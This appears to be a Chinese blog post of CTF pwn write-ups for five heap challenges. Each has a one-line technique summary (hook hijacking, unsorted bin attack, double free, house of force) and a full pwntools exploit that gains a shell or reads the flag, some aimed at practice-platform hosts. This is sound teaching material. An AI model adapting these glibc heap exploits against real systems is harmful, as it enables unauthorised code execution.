gyctf_2020_document
堆上有指针,通过劫持堆上的指针控制free_hook或者malloc_hook从而getshell
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
binary = 'gyctf_2020_document'
elf = ELF('gyctf_2020_document')
libc = elf.libc
context.binary = binary
DEBUG = 1
if DEBUG:
p = process(binary)
else:
host = ""
port = 0
p = remote(host,port)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def add(name,sex,payload):
sla("Give me your choice : \n","1")
sa("name\n",name)
sa("sex\n",sex)
sa("information\n",payload)
def show(idx):
sla('Give me your choice : \n',"2")
sla('Give me your index : \n',str(idx))
def free(idx):
sla('Give me your choice : \n',"4")
sla('Give me your index : \n',str(idx))
def edit(idx,payload):
sla('Give me your choice : \n',"3")
sla("Give me your index : \n",str(idx))
sla('Are you sure change sex?\n',"Y")
sa('Now change information\n',payload)
add("aaaaaaaa","bbbbbbbb","c"*112)
add("aaaaaaaa","bbbbbbbb","c"*112)
free(0)
show(0)
libc_base = l64()-0x3c4b78
lg("libc_base",libc_base)
free_hook = libc_base+0x3c67a8
lg('free_hook',free_hook)
sys_addr =0x45390+libc_base
add("/bin/sh\x00","/bin/sh\x00","c"*0x70)
free(1)
add("/bin/sh\x00","/bin/sh\x00","c"*0x70)
edit(0,p64(0)+p64(0x21)+p64(free_hook-0x10)+p64(0x1)+p64(0)+p64(0x51)+p64(0)*8)
edit(3,p64(sys_addr)+p64(0)*13)
free(1)
p.interactive()
gyctf_2020_signin
申请堆块的大小固定,由于是ubuntu18因此存在着tcache机制,我们申请8个堆块,然后释放,有一个堆块进入unsorted,接着用unsortedbinattrack来填写ptr处的值使其不为0调用后门函数
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
binary = 'gyctf_2020_signin'
elf = ELF('gyctf_2020_signin')
libc = elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
else:
host = "node3.buuoj.cn"
port = 27747
p = remote(host,port)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def add(idx):
sla("your choice?","1")
sla("idx?\n",str(idx))
def free(idx):
sla("your choice?","3")
sla("idx?\n",str(idx))
def edit(idx,payload):
sla("your choice?","2")
sla("idx?\n",str(idx))
se(payload)
def backdoor():
sla("your choice?","6")
for i in range(8):
add(i)
for i in range(8):
free(i)
edit(7,p64(0x4040C0-0x10)) #unsorted bin attrack
add(8)
backdoor()
p.interactive()
interesting
使用格式化字符串泄露地址,存在UAF漏洞,直接构造doublefree链劫持malloc_hook
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
binary = 'interesting'
elf = ELF('interesting')
libc = elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
else:
host = "node3.buuoj.cn"
port = 25188
p = remote(host,port)
def debug(cmd):
raw_input("debug:")
gdb.attach(p,cmd)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
sla("please:","OreOOrereOOreO%17$p")
sla(" to do :","0")
ru("OreOOrereOOreO")
ru("0x")
libc_base = int(p.recv(12),16)-0x20830
lg("libc_base",libc_base)
malloc_hook = libc_base+0x3c4b10
lg("malloc_hook",malloc_hook)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
one = o_g[3]+libc_base
lg("one",one)
def add(size,O,length,RE):
sla("to do :","1")
sla("length :",str(size))
sa("O : ",O)
sla("length :",str(length))
sa("RE : ",RE)
def edit(idx,payload1,payload2):
sla("to do :","2")
sla("> Oreo ID : ",str(idx))
sa("> O : ",payload1)
sa("> RE : ",payload2)
def free(idx):
sla("to do :","3")
sla("> Oreo ID : ",str(idx))
def puts(idx):
sla("to do :","4")
sla("> Oreo ID : ",str(idx))
add(0x60,"aaaa",0x70,"bbbb")
add(0x60,"cccc",0x70,"dddd")
free(1)
free(2)
free(1)
add(0x60,p64(malloc_hook-0x23),0x70,"aaaa")
add(0x60,p64(malloc_hook-0x23),0x70,"bbbb")
add(0x60,p64(malloc_hook-0x23),0x60,"a"*0x13+p64(one))
#gdb.attach(p)
sla("to do :","1")
sla("length :",str(0x20))
p.interactive()
gyctf_2020_force
house of force劫持malloc_hook因为one_gadget全部失效因此需要和realloc_hook配合使用
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
binary = 'gyctf_2020_force'
elf = ELF('gyctf_2020_force')
libc = elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
else:
host = "node3.buuoj.cn"
port = 25028
p = remote(host,port)
def debug(cmd):
raw_input("debug:")
gdb.attach(p,cmd)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
sl = lambda payload: p.sendline(payload)
def add(size,payload):
sla("puts\n","1")
sla("size\n",str(size))
p.recvuntil("0x")
addr = int(p.recv(12),16)
sa("content\n",payload)
return addr
def puts():
sla("puts\n","2")
addr = add(0x200000,"aaaaaa")
lg("addr",addr)
libc_base = addr + 0x200ff0
lg("libc_base",libc_base)
malloc_hook = libc_base+0x3c4b10
lg("malloc_hook",malloc_hook)
top = add(0x18,"a"*0x10+p64(0)+p64(0xffffffffffffffff))+0x10
lg("top",top)
realloc = libc_base+libc.sym["__libc_realloc"]
lg("realloc",realloc)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
one = o_g[1]+libc_base
offset = malloc_hook-top
lg("offset",offset)
add((offset-0x33),"aaaa")
add(0x10,"a"*0x8+p64(one)+p64(realloc+16))
#gdb.attach(p)
sla("puts\n","1")
sla("size\n",str(0x20))
p.interactive()
exceting
程序首先讲flag文件读进了程序中,并且在0x6020a0处还存在着一个0x60的size,因此我们把堆块劫持到0x6020a0的位置,便可以直接show处flag
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
binary = 'exceting'
elf = ELF('exceting')
libc = elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
else:
host = "node3.buuoj.cn"
port = 26040
p = remote(host,port)
def debug(cmd):
raw_input("debug:")
gdb.attach(p,cmd)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
sl = lambda payload: p.sendline(payload)
def add(length,ba,size,na):
sla("do :","1")
sla("length :",str(length))
sla("ba :",ba)
sla("length :",str(size))
sla("na :",na)
def free(idx):
sla("do :","3")
sla("ID :",str(idx))
def show(idx):
sla("do :","4")
sla("ID :",str(idx))
add(0x50,"aaaa",0x50,"aaaa")
add(0x50,"bbbb",0x50,"bbbb")
free(0)
free(1)
free(0)
add(0x50,p64(0x6020a0-8),0x50,p64(0x6020a0-8))
add(0x50,p64(0x6020a0-8),0x50,p64(0x6020a0-8))
add(0x50,"",0x30,"")
show(2)
#gdb.attach(p)
p.interactive()
网友评论